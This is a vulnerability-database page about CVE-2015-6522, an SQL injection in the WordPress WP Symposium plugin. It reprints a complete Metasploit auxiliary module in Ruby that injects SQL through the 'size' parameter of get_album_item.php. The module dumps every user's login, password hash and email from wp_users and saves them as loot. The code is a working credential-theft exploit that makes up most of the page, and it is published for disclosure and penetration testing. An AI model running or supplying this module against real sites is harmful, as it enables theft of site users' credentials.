Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Symposium Plugin SQL Injection

🗓️ 31 Aug 2024 00:00:00Reported by Matteo Cantoni, PizzaHatHacker, metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 242 Views

SQL Injection in WordPress Symposium Plugin allows remote attackers to extract credentials via the size parameter to get_album_item.php.

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2015-6522
29 May 201815:50
circl
CNVD		WordPress WP Symposium Plugin SQL Injection Vulnerability
20 Aug 201500:00
cnvd
Check Point Advisories		WordPress Symposium Plugin SQL Injection (CVE-2015-6522)
8 Dec 201600:00
checkpoint_advisories
CVE		CVE-2015-6522
19 Aug 201515:00
cve
Cvelist		CVE-2015-6522
19 Aug 201515:00
cvelist
Metasploit		WordPress Symposium Plugin SQL Injection
17 Nov 201614:04
metasploit
NVD		CVE-2015-6522
19 Aug 201515:59
nvd
OpenVAS		WordPress WP Symposium Multiple SQL Injection Vulnerabilities
24 Aug 201500:00
openvas
Patchstack		WordPress Symposium Plugin 15.1 - SQL Injection #2
18 Aug 201500:00
patchstack
Patchstack		WordPress Symposium Plugin <= 15.7- SQL Injection
19 Aug 201500:00
patchstack
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HTTP::Wordpress  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'WordPress Symposium Plugin SQL Injection',  
'Description' => %q{  
This module exploits a SQL injection vulnerability in the WP Symposium plugin  
before 15.8 for WordPress, which allows remote attackers to extract credentials  
via the size parameter to get_album_item.php.  
},  
'Author' => [  
'PizzaHatHacker', # Vulnerability discovery  
'Matteo Cantoni <goony[at]nothink.org>' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' => [  
['CVE', '2015-6522'],  
['EDB', '37824']  
],  
'DisclosureDate' => '2015-08-18'  
)  
)  
  
register_options(  
[  
OptString.new('URI_PLUGIN', [true, 'The WordPress Symposium Plugin URI', 'wp-symposium'])  
]  
)  
end  
  
def check  
check_plugin_version_from_readme('wp-symposium', '15.8.0', '15.5.1')  
end  
  
def uri_plugin  
normalize_uri(wordpress_url_plugins, datastore['URI_PLUGIN'], 'get_album_item.php')  
end  
  
def send_sql_request(sql_query)  
uri_complete = normalize_uri(uri_plugin)  
  
begin  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => uri_complete,  
'vars_get' => { 'size' => sql_query }  
)  
  
return nil if res.nil? || res.code != 200 || res.body.nil?  
  
res.body  
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e  
vprint_error("#{peer} - The host was unreachable!")  
return nil  
end  
end  
  
def run  
vprint_status("#{peer} - Attempting to connect...")  
vprint_status("#{peer} - Trying to retrieve the first user id...")  
first_id = send_sql_request('id from wp_users order by id asc limit 1 ; --')  
if first_id.nil?  
vprint_error("#{peer} - Failed to retrieve the first user id... Try with check function!")  
return  
else  
vprint_status("#{peer} - First user-id is '#{first_id}'")  
end  
  
vprint_status("#{peer} - Trying to retrieve the last user id...")  
last_id = send_sql_request('id from wp_users order by id desc limit 1 ; --')  
if last_id.nil?  
vprint_error("#{peer} - Failed to retrieve the last user id")  
return  
else  
vprint_status("#{peer} - Last user-id is '#{last_id}'")  
end  
  
credentials = ''  
  
vprint_status("#{peer} - Trying to retrieve the users information...")  
for user_id in first_id..last_id  
separator = Rex::Text.rand_text_numeric(7, bad = '0')  
user_info = send_sql_request("concat_ws(#{separator},user_login,user_pass,user_email) from wp_users where id = #{user_id} ; --")  
  
if user_info.nil?  
vprint_error("#{peer} - Failed to retrieve the users info")  
return  
else  
values = user_info.split(separator.to_s)  
  
user_login = values[0]  
user_pass = values[1]  
user_email = values[2]  
  
print_good("#{peer} - #{sprintf('%-15s %-34s %s', user_login, user_pass, user_email)}")  
connection_details = {  
module_fullname: fullname,  
username: user_login,  
private_data: user_pass,  
private_type: :nonreplayable_hash,  
status: Metasploit::Model::Login::Status::UNTRIED,  
proof: user_email  
}.merge(service_details)  
create_credential(connection_details)  
  
credentials << "#{user_login},#{user_pass},#{user_email}\n"  
end  
end  
  
unless credentials.empty?  
loot = store_loot('wp_symposium.http', 'text/plain', rhost, credentials)  
vprint_good("Credentials saved in: #{loot}")  
end  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
EPSS0.79815
wordpress symposium pluginsql injectionremote attackersextract credentialsget_album_item.phpmetasploit modulecve-2015-6522edb-37824disclosure date
242